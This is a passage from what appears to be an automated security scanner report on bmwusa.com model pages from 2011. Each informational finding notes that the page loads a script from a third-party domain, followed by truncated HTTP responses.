<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.256. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35i/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive35i/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:47:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:07:24 GMT;path=/
Content-Length: 222920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.257. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35i/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive35i/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:47:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:07:08 GMT;path=/
Content-Length: 211101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.258. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35i/x5seriessavmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive35i/x5seriessavmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:47:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:07:12 GMT;path=/
Content-Length: 202179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.259. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35ipremium/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive35ipremium/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:47:46 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:07:46 GMT;path=/
Content-Length: 214639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.260. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35ipremium/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive35ipremium/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:50:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:10:01 GMT;path=/
Content-Length: 223773

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.261. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35ipremium/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive35ipremium/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:49:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:09:37 GMT;path=/
Content-Length: 211572

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.262. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35ipremium/x5seriessavmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive35ipremium/x5seriessavmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:50:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:10:06 GMT;path=/
Content-Length: 202433

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.263. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35ipremium/x5seriessavmediagallery.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive35ipremium/x5seriessavmediagallery.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:49:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:09:43 GMT;path=/
Content-Length: 202434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.264. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35isportactivity/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive35isportactivity/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:51:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:11:44 GMT;path=/
Content-Length: 214810

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.265. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35isportactivity/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive35isportactivity/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:53:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:13:06 GMT;path=/
Content-Length: 224590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.266. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35isportactivity/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive35isportactivity/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:52:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:12:17 GMT;path=/
Content-Length: 212232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.267. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35isportactivity/x5seriessavmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive35isportactivity/x5seriessavmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:52:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:12:20 GMT;path=/
Content-Length: 202463

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.268. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive50i/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive50i/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:54:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:14:38 GMT;path=/
Content-Length: 214419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.269. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive50i/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive50i/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:56:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:16:25 GMT;path=/
Content-Length: 223508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.270. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive50i/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive50i/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:54:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:14:48 GMT;path=/
Content-Length: 213474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.271. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive50i/x5seriessavmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive50i/x5seriessavmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:55:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:15:48 GMT;path=/
Content-Length: 202181

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.272. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x6/activehybridx6/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:01:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:21:12 GMT;path=/
Content-Length: 212497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.273. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x6/activehybridx6/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:59:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:19:15 GMT;path=/
Content-Length: 212498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.274. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x6/activehybridx6/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:01:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:21:07 GMT;path=/
Content-Length: 229245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.275. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/features_and_specs/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x6/activehybridx6/features_and_specs/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:00:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:20:55 GMT;path=/
Content-Length: 229246

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.276. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x6/activehybridx6/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:00:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:20:10 GMT;path=/
Content-Length: 215531

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.277. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/modelhighlights/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x6/activehybridx6/modelhighlights/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:59:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:19:49 GMT;path=/
Content-Length: 215532

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.278. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/x6seriessacmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x6/activehybridx6/x6seriessacmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:00:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:20:51 GMT;path=/
Content-Length: 202378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.279. http://www.bmwusa.com/standard/content/vehicles/2011/x6/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x6/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:58:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:18:17 GMT;path=/
Content-Length: 195775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.280. http://www.bmwusa.com/standard/content/vehicles/2011/x6/x6explore.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x6/x6explore.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:59:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:19:12 GMT;path=/
Content-Length: 179285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.281. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive35i/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x6/xdrive35i/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:01:21 GMT
Connection: close
Connection: Transfer-Encoding
